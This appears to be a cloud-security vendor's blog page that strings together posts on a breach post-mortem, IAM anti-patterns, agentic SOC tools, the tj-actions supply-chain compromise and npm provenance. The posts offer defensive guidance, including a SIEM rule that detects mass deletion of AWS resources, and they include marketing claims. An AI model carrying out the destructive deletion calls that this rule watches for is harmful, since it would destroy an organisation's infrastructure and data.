Built-in security tools from SaaS and IaaS providers are robust, but they typically focus on static defenses and configuration checks. They rarely detect real-time threats like credential misuse or unauthorized account activity—issues central to the KiranaPro breach.

Threats don’t just come from insiders

While insider threats (e.g., former or disgruntled employees) pose a significant risk, proactive threat monitoring is essential across multiple attack vectors. External attackers frequently exploit stolen credentials, phishing attacks, misconfigurations, and weak API security. Organizations must recognize that threats come from multiple directions simultaneously.

Proactive threat monitoring involves continuously analyzing cloud activities in real-time to spot anomalies—such as logins from unexpected locations, abrupt permission changes, or unusual data deletions—and taking immediate, automated action to contain threats. Some organizations use SIEM rules to detect these patterns. Others adopt platforms that deliver out-of-the-box monitoring across SaaS and IaaS environments.
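As an illustrative sketch, a Sigma-style SIEM rule for the “unusual data deletions” case might look like the following; the event names, time window, and threshold are examples to adapt, not a tuned detection:

title: Mass deletion of cloud resources
status: experimental
logsource:
  product: aws
  service: cloudtrail
detection:
  selection:
    eventName:
      - DeleteBucket        # S3
      - TerminateInstances  # EC2
      - DeleteDBCluster     # RDS
  timeframe: 10m
  # fire when a single identity issues more than 10 delete calls in the window
  condition: selection | count() by userIdentity.arn > 10
level: high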

Practical takeaways from KiranaPro

The KiranaPro breach underscores the importance of continuous vigilance in cloud security. Organizations cannot afford to adopt a passive stance:

  • Strict access controls: Access to critical systems should be restricted to only those who absolutely need it, following the principle of least privilege. Over-permissioned accounts increase the impact of any compromise or misuse. Privileged actions should be tightly scoped, and administrative access should be granted only when required and revoked when not in use.
  • Avoid persistent IAM credentials: Long-lived credentials—especially for privileged IAM users or root accounts—create enduring risk. Instead, use short-lived, automatically rotated credentials issued via identity federation (e.g., IAM roles with SSO) or just-in-time access. This approach reduces exposure, improves auditability, and makes it easier to manage access at scale.
  • Systematic offboarding: Any IAM user accounts or long-term credentials associated with former employees must be revoked immediately. However, simply deleting these credentials can break production systems, so it’s critical to understand their usage beforehand. Having visibility into actual credential usage and mapping dependencies is therefore essential for secure offboarding; a quick CLI check is sketched after this list.
  • Change control via CI systems: All changes to production environments should be enforced through controlled CI/CD pipelines with mandatory approvals. This discipline adds a valuable layer of oversight and would have likely caught or prevented a destructive action like a mass deletion. While idealistic, it’s a proven safeguard that mature cloud teams should strive toward.
  • Disaster recovery and backups: No system is immune to compromise. Having a disaster recovery plan—including infrastructure-as-code templates and tested, restorable backups—can make the difference between downtime and a total shutdown. KiranaPro’s inability to quickly recover infrastructure suggests major gaps in their resilience planning.
  • Proactive monitoring: Investing in active threat monitoring solutions ensures real-time visibility into system activities, significantly enhancing the ability to detect and mitigate potential security threats swiftly.
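On the offboarding point, a minimal sketch of checking whether a former employee’s credentials are still in active use before revoking them (the user name and access key ID are placeholders):

# List the departed user's access keys
aws iam list-access-keys --user-name former-employee

# For each key, see when and against which service it was last used
aws iam get-access-key-last-used --access-key-id AKIAIOSFODNN7EXAMPLE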

Additional best practices from the field

In our previous blog, “Bridging the Cloud Security Gap: Real-World Use Cases for Threat Monitoring,” we examined common cloud security anti-patterns and offered actionable guidance to continuously monitor, detect, and effectively respond to emerging threats.

One highlighted use case involved a device manufacturing company relying on a single IAM user with long-term credentials accessed from multiple locations. This setup amplified risk due to varied operating systems and environments. To mitigate this type of risk, additional recommendations from our best practices blog include:

  • IP Allow-Listing: Defining and enforcing an allowed list of IP addresses for each location.
  • Resource Access Monitoring: Continuously monitoring and logging which resources the IAM user accesses.
  • User Agent and Device Validation: Identifying and allowing only predefined user agents and flagging anomalies.

These measures are also applicable to preventing cloud breaches like the one experienced by KiranaPro.

Conclusion

The KiranaPro breach is a reminder that cloud security requires ongoing, active vigilance. Organizations should move beyond relying solely on provider-native tools and adopt continuous threat monitoring as a foundational security practice. By clearly understanding their security responsibilities, implementing robust access governance, and monitoring cloud activities proactively, companies can significantly reduce their vulnerability to breaches and maintain operational resilience.

Need help building real-time visibility across your cloud stack? Exaforce provides AI-driven threat monitoring across IaaS and SaaS environments such as AWS IaaS, GCP IaaS, GitHub, Okta, AWS Bedrock, and Google Workspace, letting you expand your threat coverage to your cloud services without writing and maintaining rules. Contact us to request a demo.

May 29, 2025

3 points missing from agentic AI conversations at RSAC

Agentic AI tools for security operations centers promise to enhance—not replace—human analysts, but their true value lies in thoughtful integration, deep context, and rigorous proof-of-concept testing, not hype-driven adoption.

This article originally appeared in SC Magazine.

For those who attended RSAC 2025, chances are agentic AI came up in conversation. Vendors pushed dozens of agentic AI products, many of which were tailored to use cases for security operations centers (SOCs) – and marketers dove in head-first to position their companies at the forefront of innovation.

However, thoughtful dialogue about the practical application and true value of agentic AI in the SOC got lost. Here’s what many of the sales pitches missed:

Agentic SOC platforms are a force multiplier, not a replacer.

One of the biggest misconceptions about agentic SOC solutions that we heard is that they will put security professionals out of work and replace some of the tools they’re most familiar with, such as security incident and event management (SIEM) tools. That’s not accurate - in fact, humans, SIEMs and agentic SOC solutions work better when used in tandem.

Security professionals benefit from using effective agentic SOC tools: the new products minimize tedious workloads, time spent triaging alerts and performing investigations decreases substantially, and analysts gain more time to uplevel and focus on high-tier investigations and response tasks.

SIEMs have been around for decades and aren’t going anywhere. They collect large amounts of historical data and context that agentic SOC solutions can rely on to produce recommendations and responses. While some agentic SOC tools add reasoning and action to datapoints, they need access to the context in the SIEMs to remain effective.

Context too often gets overlooked.

An overlooked aspect of agentic AI that has gotten lost in conversations about minimizing workloads is its ability to work in tandem with third-party systems. These third-party tools and data sources have nuanced interfaces, data schemas, and operations that agents can misinterpret without deep contextual knowledge of how a tool works. AI agents need deep integration, with sufficient access to data, visibility into workflows, strong feedback mechanisms and environmental context.

If that enabling deep context gets overlooked, agentic AI tooling can add tasks to a to-do list rather than removing them. For example, if the solution triages an alert and offers a recommendation, is there transparency into how that data was gathered? Do we have to go through another system to get it? Is that adding work for the team? The required level of context, and the importance of automating fine-tuning after deployment, are still being overlooked.

The vendors don’t offer PoCs that can prove a product’s real value.

Crowded booths and flashy banners were everywhere, but booth demos are optimized to tease the best functionality the vendor has to offer – they can’t deliver the insights that deploying the product in the user’s own environment can elicit.

Vendor claims for agentic AI SOC tools ranged from saving time and money to agents making decisions and executing on them autonomously. A proof of concept (PoC) can help verify whether those claims hold up under the conditions of the company’s SOC. Can the tool operate with the company’s specific data volumes and alert types? Can it integrate with the tools in the tech stack that are crucial to the organization’s business operations?

Many may think: “PoCs are nothing new – we know there’s value.” True, but the misconception that AI agents will replace security professionals, combined with the current economic climate, adds concerns that a PoC can quell far better than a paper evaluation. Giving analysts the opportunity to test the product and see that it’s there to help them, not replace them, goes a long way in building trust between the user and the product, as well as between the employee and the investment decision-makers.

Getting a PoC and fighting the urge to make a heavy investment immediately for the sake of quick innovation lets a team fine-tune the tool’s logic, policies and thresholds to match a SOC’s risk appetite and operational nuances.

As with any new technology, we’re bound to have a hype cycle that spins up fluff. To find the true value of a new product, take it for a test drive and hold it to a high standard to deliver on its promises. Make sure the outcomes are accurate, the sources transparent, and the data immediately accessible, and that it complements the operations of the teams and tools that are crucial to the success of the organization.

May 27, 2025

5 reasons why security investigations are broken - and how Exaforce fixes them

Struggling with alert overload or slow triage? Discover 5 reasons security investigations fail—and how Exaforce uses AI to fix them fast.

Security investigations have been broken for years. The problems are nothing new: 

  • Alerts without context that leave analysts scrambling to gather all the relevant data
  • Gaps in cloud knowledge - analysts are forced to triage issues they don't have expertise in
  • Slow, cumbersome investigations that can take hours
  • Lack of expertise in system nuances like advanced querying, log parsing, etc.
  • Overwhelming alert volumes that cause fatigue and mistakes

Every SOC team has felt the pain. What’s changed is the scale and complexity of the environments we defend—cloud-native architectures, third-party SaaS sprawl, identity complexity, and constantly evolving threats. The tradition of static rules, dashboards, prebuilt playbooks, and SIEM queries simply can’t keep up.

At Exaforce, we’re building a new way forward.

We combine AI bots (called “Exabots”)  with advanced data exploration to make security operations faster, smarter, and radically more scalable. Our platform understands your cloud and SaaS environments at a behavioral level—connecting logs, configs, identities, and activities into a unified, contextual graph. From there, our task-specific Exabots take over, autonomously triaging alerts, answering investigation questions, and threat hunting—with accuracy and evidence.

The result? Clear explanations, actionable insights, and fewer hours wasted digging through logs or waiting on other teams.

In the following sections, we review the five main reasons investigations are still broken—and how Exaforce solves those issues for the SOC.

1. Not enough context: “What even is this alert?”

Most alerts land in your SIEM with minimal templated explanations. Why did it fire? What does it mean? What’s the potential impact? Ideally, every alert would come with a detailed description, evidence, and an investigation runbook. In reality, most teams never have the time to write or maintain this. Even anomaly alerts often fall short—showing raw logs instead of a clear comparison to expected behavior. For example, AWS GuardDuty alerts show up with generic terms like “unusual” and “differ from the established baseline.” They do not contain enough detail to analyze or confirm the finding, and understanding what the abnormal behavior was, or what normal looked like, inevitably requires additional data and lookups.

A sample GuardDuty finding with minimal information about the nature of the suspicious and unusual activity.
The same finding after the Exaforce enrichment, analyzed on multiple dimensions that clearly articulate the anomalies.

The Exaforce Approach:

  • Every alert—ours or third-party—comes with an explanation of why it fired: in “easy mode” English for quick understanding, and in “hard mode” with full data details for those who want to go deep.
  • Data supporting the conclusion is shown clearly—so you have concrete evidence.
  • Alerts are enriched automatically with data from multiple sources—no SOAR playbook required.
  • All findings include “next steps” to kickstart the investigation or remediation.
  • Similar and duplicate alerts are grouped out-of-the-box to prevent redundant effort.

Whether you’re skimming or scrutinizing, Exaforce gives you the context you need to move with confidence.

2. Lack of cloud knowledge: “We’re a SOC, not cloud ops.”

Most SOC analysts come from network security backgrounds. Now they’re expected to triage cloud alerts involving IAM chains, misconfigured S3 buckets, and GitHub permissions. Meanwhile, the actual cloud or DevOps teams often live in a different org entirely, making collaboration slow and awkward. Not sure why user A was able to perform a risky action? Not familiar with how AWS identity chaining works? No problem: we summarize the effective permissions a user has, and if you want the details, show you the full identity chain of how they got them.

An example of permission analysis done by Exaforce. All the user's roles and their usage are presented, as well as a view of the effective permissions.
An example of the visual layout of a user's permissions from their IDP through the various AWS services they can access, traversing the complex identity and permission management structure.

The Exaforce Approach:

  • Exabot acts as your built-in AI cloud expert—explaining alerts in natural language.
  • Works across cloud and SaaS sources like AWS, GCP, Okta, GitHub, Google Workspace, and more.
  • For deeper dives, the investigate tab provides full technical context—ideal for handing off to DevOps or engineering.
  • Our semantic graph view shows how users, roles, and resources connect—so analysts can understand identity behaviors visually, not just textually.

We bridge the cloud knowledge gap, translating cloud complexity into clarity.

3. Time to investigate: Attacks are quick, investigations aren’t.

Investigating a single alert can take hours—jumping between consoles, writing queries, checking with senior analysts, and gathering context from different systems. Now multiply that by the volume of daily alerts, and investigation becomes the biggest bottleneck in your entire response pipeline.

The Exaforce Approach:

  • Exabot handles triage in under 5 minutes, using semantic context to reach conclusions with supporting evidence.
  • And if you have questions? Just ask Exabot—no Slack messages, no dashboards to build, no delays.
The queue of findings. Many have already been marked false positive.
A view inside the activity of an Exaforce finding - finding created and promptly analyzed, analyst asked a question and bot responded immediately with a robust response.

We cut investigation time down from hours to minutes—without cutting corners.

4. Lack of expertise: You shouldn’t need to be a SQL ninja.

Investigations traditionally require deep knowledge: what logs to look at, how they’re structured, what’s “normal,” and how to ask the right questions in the right query language. Most junior analysts just don’t have that expertise—and most teams don’t have the documentation to help.  

 The Exaforce Approach:

  • Exabot answers complex questions in plain language—no syntax required.
  • Want details? Every alert comes with a bespoke investigation canvas—pre-loaded with all the questions an analyst would ask, and data-heavy answers for each one.
  • Our semantic data model pre-enriches and structures log data so analysts see what matters, when it matters. You get enriched, joined, cleaned, and contextualized data out of the box. 
  • We surface behavioral baselines, patterns, and ownership insights that usually live in tribal knowledge.

Even this common AWS GuardDuty alert for unusual behavior requires an analyst to understand who the root identity is, query for other logs in the same time period, parse those logs for a unique list of resources touched, extend the query to include other users on the same resources to establish a baseline, and build statistical analysis to understand “normal” behavior for the user, action, location, and resource. But not with Exaforce:

The detailed Exaforce investigation canvas supporting the recommendation. Note the Q&A style with supporting data.

Now anyone on the team can investigate like a pro—without mastering a query language, managing log parsers, or building custom dashboards.

5. Too many alerts: Welcome to burnout city.

Your team gets thousands of alerts, and most of them (85%+) are false positives. Analysts get desensitized, threat signals get missed, and triage becomes a box-checking exercise instead of a security process. (A great analysis of the alert-fatigue problem by security guru Anton Chuvakin: https://medium.com/anton-on-security/antons-alert-fatigue-the-study-0ac0e6f5621c)

 The Exaforce Approach:

  • Exaforce automatically triages the majority of alerts.
  • Duplicate and related alerts are grouped together so they can be handled once.
  • Analysts only focus on the high-signal, high-impact findings that actually require human insight.
A grouped Exaforce finding. Findings from GitHub and AWS are aggregated into a larger finding with a higher severity.

We cut the noise, so your team can spend less time firefighting and more time securing.

Final Thoughts: Investigations, Reimagined

The problems aren’t new. But the solution is.

With Exaforce, you get a better approach to investigation—powered by intelligent bots and an advanced data interface that is intuitive, visual, and conversational.

May 7, 2025

Bridging the Cloud Security Gap: Real-World Use Cases for Threat Monitoring

At Exaforce, as we work with our initial set of design partners to reduce the human burden on SOC teams, we’re gaining valuable insights into current cloud usage patterns that reveal a larger and more dynamic threat surface. While many organizations invest in robust security tools like CSPM, SIEM, and SOAR, these solutions often miss the nuances of evolving behaviors and real-time threats. This blog examines common cloud security anti-patterns and offers actionable guidance, including practical remediation measures, to continuously monitor, detect, and effectively respond to emerging threats.

Use Case: Single IAM User With Long Term Credentials Accessed From Multiple Locations

A device manufacturing company relies on a single IAM user with long-term credentials for various tasks such as device testing, telemetry collection, and metrics gathering across multiple factories in different geographic regions. This consolidated identity is used from varied operating systems (e.g., Linux, Windows) and environments, which amplifies risk.

AWS IAM user X accessing multiple S3 buckets from processes running in factories located in different locations.

Threat Vectors and Monitoring Recommendations

To mitigate the risks associated with such a setup, focus on continuous threat monitoring with these priority measures:

1. IP Allow-Listing

  • Define and enforce an allowed list of IP addresses for each factory.
  • Alert on any access attempts from unauthorized IPs.
  • Tool: AWS IAM policy conditions. Below is an example that denies everything except requests from CIDRs 192.0.2.0/24 and 203.0.113.0/24.
AWS IAM policy to deny all requests unless requests originate from specified IP address ranges.
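A minimal sketch of such a policy, attached to the IAM user (note that aws:SourceIp conditions do not apply to calls AWS services make on your behalf, so test carefully before enforcing broadly):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyAllOutsideFactoryRanges",
      "Effect": "Deny",
      "Action": "*",
      "Resource": "*",
      "Condition": {
        "NotIpAddress": {
          "aws:SourceIp": ["192.0.2.0/24", "203.0.113.0/24"]
        }
      }
    }
  ]
}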

2. Resource Access Monitoring

  • Continuously monitor and log which resources the IAM user accesses.
  • Correlate access patterns with expected behavior for each factory or task.
  • Tool: SIEM platforms integrated with CloudTrail logs.

3. Regular Credential Rotation

  • Implement strict policies to rotate long term credentials periodically.
  • Automate token rotation and integrate alerts for unusual rotation delays.

4. User Agent and Device Validation

  • Identify and allow only a predefined list of acceptable user agents (e.g., specific OS versions like Linux and Windows Server) for each use case.
  • Flag anomalies such as access from unexpected operating systems (e.g., macOS when not approved).
  • Tool: SIEM platforms to correlate EDR and AWS CloudTrail logs and generate detections.

Use Case: Long-Term IAM User Credentials in GitHub Pipelines

One of our SaaS provider partners embeds long-term AWS IAM user credentials directly in their GitHub Actions CI/CD pipelines as static GitHub secrets, allowing automation scripts to deploy services into AWS. This practice poses significant security risks: credentials stored in CI/CD pipelines can easily become exposed through accidental leaks or external breaches—as seen recently with Sisense (April 2024) and TinaCMS (Dec 2024)—enabling attackers to gain unauthorized cloud access, escalate privileges, and exfiltrate sensitive data.

GitHub pipelines using long-term AWS IAM user access keys.

Threat Vectors and Monitoring Recommendations

To monitor and detect threats associated with this anti-pattern, consider these prioritized measures:

1. Credential Usage Monitoring

  • Continuously monitor IAM user activity and set alerts for any anomalous actions, such as unusual access patterns, region shifts, or privilege escalation attempts.
  • Tool: SIEM platform integrated with CloudTrail logs.

2. Regular Credential Rotation

  • Implement strict policies to rotate long term credentials periodically.
  • Automate token rotation and integrate alerts for unusual rotation delays.

Remediation: Short-lived Credentials via OIDC

Transition to GitHub Actions’ OpenID Connect (OIDC) integration, which issues temporary credentials instead of embedding long-term keys, minimizing risk exposure.
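A minimal sketch of an OIDC-based deploy job; the role ARN and region are placeholders, and the IAM role’s trust policy must allow GitHub’s OIDC provider for your organization and repository:

name: deploy
on: push

permissions:
  id-token: write   # lets the job request a GitHub OIDC token
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # Exchange the OIDC token for short-lived AWS credentials;
      # no long-term access keys are stored as GitHub secrets.
      - uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github-deploy   # placeholder
          aws-region: us-east-1
      - run: aws sts get-caller-identity   # subsequent AWS calls use the temporary credentials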

Use Case: Ineffective Use of Permission Sets in Multi-Account Environments

A cloud-first SaaS provider is misusing AWS permission sets by provisioning direct access in the management account, where sensitive permission sets and policies are defined, instead of correctly provisioning access across member accounts. This setup complicates policy management and leaves the management account largely unmonitored, creating blind spots where identity threats can emerge before affecting production or staging.

Complex IAM access management across multiple accounts.

Threat Vectors and Monitoring Recommendations

1. Monitoring Management Account Activity

  • Monitor all IAM and policy changes in the management account; detections should trigger alerts on any modifications to permission sets or cross-account role assumptions.
  • Tool: SIEM integrated with CloudTrail logs.

2. Misconfigured Trust Relationships

  • Audit and continuously validate trust policies for cross-account roles to ensure they only allow intended access.
  • Tools: AWS Config rules to flag deviations from approved configurations.

3. Policy Drift and Unauthorized Changes

  • Implement automated periodic reviews of permission sets and associated IAM roles. This ensures that any drift or unauthorized changes are quickly detected and remediated.
  • Tools: SIEM Tool integrated with CloudTrail logs.

Use Case: Root User Access Delegated to a Third Party

Delegating root user access to a third party for managing AWS billing and administration may seem low-risk, but it leaves the company without direct oversight of its highest-privilege account. When the root credentials, including long-term passwords and MFA tokens, are controlled externally, the risk escalates dramatically: if the third party is compromised or mismanages their controls, attackers could gain unrestricted access to the entire AWS environment.

Third party with root user access to your AWS accounts.

Threat Vectors and Monitoring Recommendations

1. Monitoring Unauthorized Root Activity

  • Monitor all root user actions via CloudTrail and SIEM alerts for any anomalous behavior.
  • Tools: SIEM Tool integrated with CloudTrail logs.

2. Third-Party Compromise

  • Regularly audit third-party access and security posture.
  • Tool: Identity access management tool.

Remediation: Centralized root access

Remediate by removing standalone root access and migrating to centrally managed root access using AssumeRoot, which issues short-term credentials for privileged tasks.
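Assuming centralized root access is enabled for the organization, a sketch of the CLI flow looks like this (the account ID is a placeholder, and the session is scoped to one of AWS’s predefined root-task policies):

# Request short-lived root credentials scoped to a single privileged task,
# e.g. deleting a member account's root credentials
aws sts assume-root \
  --target-principal 123456789012 \
  --task-policy-arn arn=arn:aws:iam::aws:policy/root-task/IAMDeleteRootUserCredentials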

Contact us to learn how Exaforce leverages Exabots to address these challenges.

April 17, 2025

Reimagining the SOC: Humans + AI bots = Better, faster, cheaper security & operations

Announcing our $75M Series A to fuel our mission

Attack surfaces continue to grow as enterprises widen their digital footprint and AI goes mainstream into various aspects of the business. Meanwhile, CISOs and CIOs continue to struggle with their defenses – they all want their security operations centers (SOC) to be more efficacious, productive, and scalable.

A few years back, some of us were at F5 and Palo Alto Networks defending mission-critical applications and cloud services for global banks, major social media networks, and video collaboration platforms. We saw advanced cyber threats — from nation-states to organized crime — constantly probing our customers’ defenses. Meeting strict 24x7x365 SLAs with limited talent was an uphill battle, and our SOC teams worked tirelessly. No matter how good we got, it felt like we were always reacting, never truly getting ahead.

Simultaneously, other members of our founding team were at Google pioneering large language models (LLMs). Their main focus was on improving the quality and consistency of output from these frontier models. AI showed massive promise to automate human work, but suffered from a few inherent flaws — long- and short-term memory, consistency of reasoning, the cost of analyzing a very large data set, etc.

Together, we reached the same conclusion: the problems of security and operations cannot be solved by hiring more people, building a bigger foundation model, or building a smaller security-specific model — the solution requires ground-up rethinking!

The magical combination: Humans + Bots

We founded Exaforce with a singular goal: 10X speed-up for tasks done by humans.  And nowhere is this work more complex than in enterprise security and operations. We have made great strides towards this goal using our task-specific AI agents called “Exabots” and advanced data exploration. We think of this platform as an Agentic SOC Platform. Our goal with Exabots from conception has been to help automate difficult tasks, not the simple or low-skill tasks that you see in demos. 

For the last 18 months, we have been working with our design partners to train Exabots to help SOC analysts, detection engineers, and threat hunters. Exabots augment them to auto-triage alerts, detect breaches in critical cloud services, and simplify the process of threat hunting. We are seeing up to 60X speed-up in day-to-day tasks alongside dramatic improvement in efficacy and auditability. 

Our light-bulb moment: Multi-Model AI Engine

Our ex-Google team knew from day one that no foundation model would be able to deliver the consistency of reasoning needed for human-grade analysis of threat alerts, or analyze all runtime events at cost points that make breach detection viable. As a result, we had to innovate on a brand-new approach, building a multi-model AI engine that combines three different types of AI models we have been developing for the last 18 months:

  • Semantic Model: builds human-grade understanding of runtime events/logs, cloud configuration, code, identity data, and threat feeds.
  • Behavioral Model: learns patterns of actions, applications, data, resources, identities (humans and machines), locations, etc.
  • Knowledge Model: an LLM that performs reasoning on this data, executes dynamically generated workflows, and analyzes historical tickets in ITSM systems (e.g., Jira, ServiceNow).

Together, these models work in perfect harmony to overcome the inherent flaws of an LLM-only approach (long- and short-term memory, consistency of reasoning, cost of reasoning over a very large data set). This AI engine can analyze all the data at cost points that are unmatched in the industry and still deliver human-grade analysis!

Backed by leading investors: $75 Million in Series A

Today, we’re thrilled to announce $75 million in Series A funding, led by Khosla Ventures and Mayfield, alongside Thomvest, Touring Capital, and others who share our belief in augmenting today’s hard-working cyber professionals with AI that works consistently and reliably!

This investment allows us to scale our investment in R&D to refine our multi-model AI engine, train Exabots to perform more and more complex tasks, and onboard more design partners eager to see how an agentic SOC can transform their security operations. 

A glimpse into the future of SOC

With Exaforce, our design partners are already seeing a multitude of benefits for their SOC teams:

  • Higher Efficacy: much higher consistency and quality in investigating complex threats than their existing in-house SOC or external partners (MSSP and MDR)
  • Better Productivity: much faster detection of and response to complex threats to their cloud services compared to existing SIEM/CDR solutions
  • Cheaper to Scale: automated handling of challenging and tedious tasks (data collection, analysis, user and manager confirmations, ticket analysis, etc.) along with the ability to scale defense on demand without adding headcount or new contracts with MDR/MSSP

See what the Wall Street Journal has to say about our funding! 

What’s next

Though we’re very excited about launching the company, our journey is just beginning! We’ll continue collaborating with more design partners to expand coverage, refine AI workflows, and ensure that humans always remain in control. Our goal is to build a SOC where AI handles the busywork and humans focus on true threats — creating a security environment that is truly more consistent in results, faster in response, and lower in TCO.

If you want a SOC that is composed of superhuman analysts, detection engineers, or threat hunters - request a demo to learn more. Together, we can build the future of the SOC!

March 16, 2025

Safeguarding against GitHub Actions (tj-actions/changed-files) compromise

How users can detect, prevent, and recover from supply chain threats with Exaforce

Since March 14th, 2025, Exaforce has been busy helping our design partners overcome a critical attack on the software supply chain through GitHub. This is the second major attack on our design partners’ cloud deployments in the last six months, and we are grateful to have delivered value to them.

What Happened?

On March 14, 2025, security researchers detected unusual activity in the widely used GitHub Action tj-actions/changed-files. This action, primarily designed to list changed files in repositories, suffered a sophisticated supply chain compromise. Attackers injected malicious code into nearly all tagged versions through a malicious commit (0e58ed8671d6b60d0890c21b07f8835ace038e67).

The malicious payload was a base64-encoded script designed to print sensitive CI/CD secrets — including API keys, tokens, and credentials — directly into publicly accessible GitHub Actions build logs. Public repositories became especially vulnerable, potentially allowing anyone to harvest these exposed secrets.

Attackers retroactively updated version tags to point to the compromised commit, meaning even pinned tagged versions (if not pinned by specific commit SHAs) were vulnerable. While the script didn’t exfiltrate secrets to external servers, it exposed them publicly, leading to the critical vulnerability CVE-2025-30066.

How We Helped Our Design Partners

Leveraging the Exaforce Platform, we swiftly identified all customer repositories and workflows using the compromised action. Our analysis included:

  • Quickly querying repositories and workflows across customer accounts.
  • Identifying affected secrets used by compromised workflows.
  • Directly communicating these findings and recommended remediation actions to affected customers.

Our security team proactively informed customers, detailing specific impacted workflows and guiding them to rotate compromised secrets immediately.

What Should You Do?

Use the search URL below to look for impacted repositories. Replace the string <Your Org Name> with your GitHub org name.

https://github.com/search?q=org%3A<Your Org Name>+tj-actions%2Fchanged-files+&type=issues

If your workflows include tj-actions/changed-files, take immediate action.

  • Stop Using the Action Immediately: Remove all instances from your workflows across all branches.
  • Review Logs: Inspect GitHub Actions logs from March 14–15, 2025, for exposed secrets. Assume all logged secrets are compromised, especially in public repositories.
  • Rotate Secrets: Immediately rotate all potentially leaked credentials — API keys, tokens, passwords.
  • Switch to Alternatives: Use secure alternatives or inline file-change detection logic until a verified safe version becomes available.

Lessons Learned

This breach highlights critical vulnerabilities inherent in software supply chains. Dependence on third-party actions requires stringent security practices:

  • Pin your third-party GitHub Actions to commit SHAs instead of version tags
  • Wherever possible, use native Git commands within your workflow rather than relying on a third-party action; this avoids external dependencies and reduces supply chain risk (see the sketch after this list)
  • Restrict permissions via minimally scoped tokens (like GITHUB_TOKEN)
  • Implement continuous runtime monitoring, including enabling audit logs and action logs and capturing detailed resource information, to promptly detect anomalous behavior and facilitate comprehensive investigations
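A minimal sketch of the first two recommendations for a push-triggered workflow (the pinned SHA is a placeholder, not a vetted commit):

jobs:
  changed-files:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0   # fetch full history so git can diff across commits
      # Option 1: if you keep a third-party action, pin it to a full commit SHA
      # instead of a mutable tag:
      # - uses: tj-actions/changed-files@0123456789abcdef0123456789abcdef01234567   # placeholder SHA
      # Option 2: drop the dependency entirely and use native git
      - name: List changed files
        run: git diff --name-only "${{ github.event.before }}" "${{ github.sha }}"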

By adopting these best practices, organizations can significantly reduce the risk posed by compromised third-party software components.

Reach out to us at contact@exaforce.com if you’d like to understand how we protect GitHub and other data sources from supply chain compromises and other threats.

November 6, 2024

Npm provenance: bridging the missing security layer in JavaScript libraries

Why verifying package origins is crucial for secure JavaScript applications

The recent security incident involving the popular lottie-player library once again highlighted the fragility of the NPM ecosystem’s security. While NPM provides robust security features like provenance attestation, many of the most downloaded packages aren’t utilizing these critical security measures.

What is NPM Provenance?

NPM provenance, introduced last year, is a security feature that creates a verifiable connection between a published package and its source code repository. When enabled, it provides cryptographic proof that a package was built from a specific GitHub repository commit using GitHub Actions or GitLab runners. This helps prevent supply chain attacks where malicious actors could publish compromised versions of popular packages. However, it’s important to note that this security relies on the integrity of your build environment itself — if your GitHub/GitLab account or CI/CD pipeline is compromised, the provenance attestation could still be generated for malicious code. Therefore, securing your source control and CI/CD infrastructure with strong access controls, audit logging, and regular security reviews remains critical.

The Current State of Popular NPM Packages

Let’s examine some of the most downloaded NPM packages and their provenance status:

Among the 2,000 most downloaded packages on jsDelivr, 205 packages have a public GitHub repository and publish directly to npm using GitHub Workflows. However, only 26 (12.6%) of these packages have enabled provenance — a security feature that verifies where and how a package was built. Making this incremental change to their GitHub workflows would be a significant security improvement for the entire community.

Critical Gaps in NPM’s Security Model

Server-Side Limitations

The NPM registry currently lacks critical server-side enforcement mechanisms:

1. No Mandatory Provenance

  • Packages can be published without any attestation
  • No way to enforce provenance requirements for specific packages or organizations
  • Registry accepts packages with or without verification

2. Missing Policy Controls

  • Organizations cannot set requirements for package publishing
  • No ability to enforce provenance for specific package names or patterns similar to git branch protection
  • No automated verification of build source authenticity

3. Version Control

  • No mechanism to prevent version updates without matching provenance
  • Cannot enforce stricter requirements for major version updates

Client-Side Verification Gaps

npm/yarn client tools also lack essential security controls:

1. Installation Process

2. Missing Security Features

  • No built-in flags to require provenance
  • Cannot enforce organization-wide attestation policies
  • No way to verify single package attestation

3. Package.json Limitations

The Lottie-Player Incident

The recent compromise of the lottie-player library serves as a stark reminder of what can go wrong. The attack timeline:

  1. Attackers gained access to the maintainer’s NPM account
  2. Published a malicious version of the package
  3. Users automatically received the compromised version through unpinned dependency updates and direct CDN links
  4. Malicious code executed on affected systems

Had provenance attestation been enforced at either the registry or client level, this attack could have been prevented.

Why Aren’t More Packages Using Provenance?

Several factors contribute to the low adoption of NPM provenance:

  1. Awareness Gap: Many maintainers aren’t familiar with the feature
  2. Implementation Overhead: Requires GitHub Actions workflow modifications
  3. Legacy Systems: Existing build pipelines may need significant updates
  4. False Sense of Security: Reliance on other security measures like 2FA
  5. Lack of Enforcement: No pressure to implement due to missing registry requirements

To enable provenance for your NPM packages:

<script src="https://gist.github.com/pupapaik/9cc17e02a0b204281a5c14d8bc56aabb#file-npm-publish-workfow-yaml.js"></script>

Or enable it in package.json:

<script src="https://gist.github.com/pupapaik/fc640fbadf4581ad92b2143c7391e791#file-package-provenance-json.js"></script>

Package Provenance check

The npm audit signatures command can check the integrity and authenticity of packages, but it doesn’t allow you to verify individual packages — only all packages in a project at once.
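The check runs over every dependency in the current project at once:

# From a project with an installed, locked dependency tree
npm ci
npm audit signatures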

NPM with invalid attestations

Since the npm CLI doesn’t provide an easy way to do this, I wrote a simple script to check the integrity and attestation of individual packages. This script makes it straightforward to validate each package.

This script can be used in a GitHub Workflow on the client side or as a monitoring tool to continuously check the attestation of upstream packages.

Client-Side Script Integrity Verification

While NPM provenance helps secure your package ecosystem, web applications loading JavaScript directly via CDN links need additional security measures. The Subresource Integrity (SRI) mechanism provides cryptographic verification for externally loaded resources. The Lottie-player attack was particularly devastating due to three common but dangerous practices:

1. Using latest tag

2. Missing integrity check

3. No Fallback Strategy

SRI works by providing a cryptographic hash of the expected file content. The browser:

  1. Downloads the resource
  2. Calculates its hash
  3. Compares it with the provided integrity value
  4. Blocks execution if there’s a mismatch
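For example, a CDN include hardened with SRI might look like the following; the URL, version, and hash are placeholders, and the digest must be computed from the exact file you intend to serve:

<!-- One way to compute the digest:
     openssl dgst -sha384 -binary lottie-player.js | openssl base64 -A -->
<script
  src="https://cdn.example.com/lottie-player/2.0.8/lottie-player.js"
  integrity="sha384-BASE64_DIGEST_PLACEHOLDER"
  crossorigin="anonymous"></script>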

When integrity verification fails, the browser refuses to execute the script and reports an error in the console.

Recommendations for the Ecosystem

1. Package Maintainers:

